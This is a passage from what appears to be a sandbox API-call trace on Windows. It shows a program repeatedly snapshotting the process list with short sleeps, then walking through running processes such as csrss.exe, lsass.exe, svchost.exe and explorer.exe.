lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.868] Sleep (dwMilliseconds=0x64) [0234.871] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0234.888] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.944] Sleep (dwMilliseconds=0x64) [0234.945] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0234.956] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.008] Sleep (dwMilliseconds=0x64) [0235.010] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0235.021] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.125] Sleep (dwMilliseconds=0x64) [0235.129] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0235.145] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.219] Sleep (dwMilliseconds=0x64) [0235.220] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0235.233] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.306] Sleep (dwMilliseconds=0x64) [0235.309] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0235.320] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.371] Sleep (dwMilliseconds=0x64) [0235.380] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0235.391] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.439] Sleep (dwMilliseconds=0x64) [0235.441] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0235.451] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.506] Sleep (dwMilliseconds=0x64) [0235.510] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0235.524] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.696] Sleep (dwMilliseconds=0x64) [0235.706] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0235.725] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.796] Sleep (dwMilliseconds=0x64) [0235.798] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0235.815] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.936] Sleep (dwMilliseconds=0x64) [0235.947] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0235.961] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.030] Sleep (dwMilliseconds=0x64) [0236.035] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0236.050] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.176] Sleep (dwMilliseconds=0x64) [0236.178] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0236.196] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.281] Sleep (dwMilliseconds=0x64) [0236.283] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0236.299] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.377] Sleep (dwMilliseconds=0x64) [0236.378] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0236.394] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.468] Sleep (dwMilliseconds=0x64) [0236.472] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0236.490] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.559] Sleep (dwMilliseconds=0x64) [0236.560] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0236.577] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.635] Sleep (dwMilliseconds=0x64) [0236.637] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0236.652] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.714] Sleep (dwMilliseconds=0x64) [0236.715] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0236.732] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.893] Sleep (dwMilliseconds=0x64) [0236.895] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0236.908] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.972] Sleep (dwMilliseconds=0x64) [0236.979] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0236.995] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.064] Sleep (dwMilliseconds=0x64) [0237.070] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0237.080] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.187] Sleep (dwMilliseconds=0x64) [0237.200] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0237.211] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.270] Sleep (dwMilliseconds=0x64) [0237.272] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0237.284] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.341] Sleep (dwMilliseconds=0x64) [0237.343] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0237.355] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.431] Sleep (dwMilliseconds=0x64) [0237.433] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0237.449] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.511] Sleep (dwMilliseconds=0x64) [0237.562] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0237.579] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.636] Sleep (dwMilliseconds=0x64) [0237.639] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0237.654] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.732] Sleep (dwMilliseconds=0x64) [0237.734] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0237.747] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.829] Sleep (dwMilliseconds=0x64) [0237.831] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0237.845] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.919] Sleep (dwMilliseconds=0x64) [0237.924] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0237.946] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.062] Sleep (dwMilliseconds=0x64) [0238.071] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0238.091] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.193] Sleep (dwMilliseconds=0x64) [0238.198] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0238.212] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.281] Sleep (dwMilliseconds=0x64) [0238.294] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0238.310] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.315] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x81, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0238.340] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0238.343] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.345] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0238.347] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.349] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0238.350] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0238.352] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0238.354] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.356] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.358] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0238.360] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x47, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.362] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.367] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.369] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.371] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.373] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.375] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.377] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0238.381] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x524, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0238.383] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x630, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0238.385] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x64c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.387] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.390] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0238.393] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0238.396] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0238.399] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0238.401] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.403] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.405] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0238.406] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.408] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.411] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0238.413] Process32Next (in: 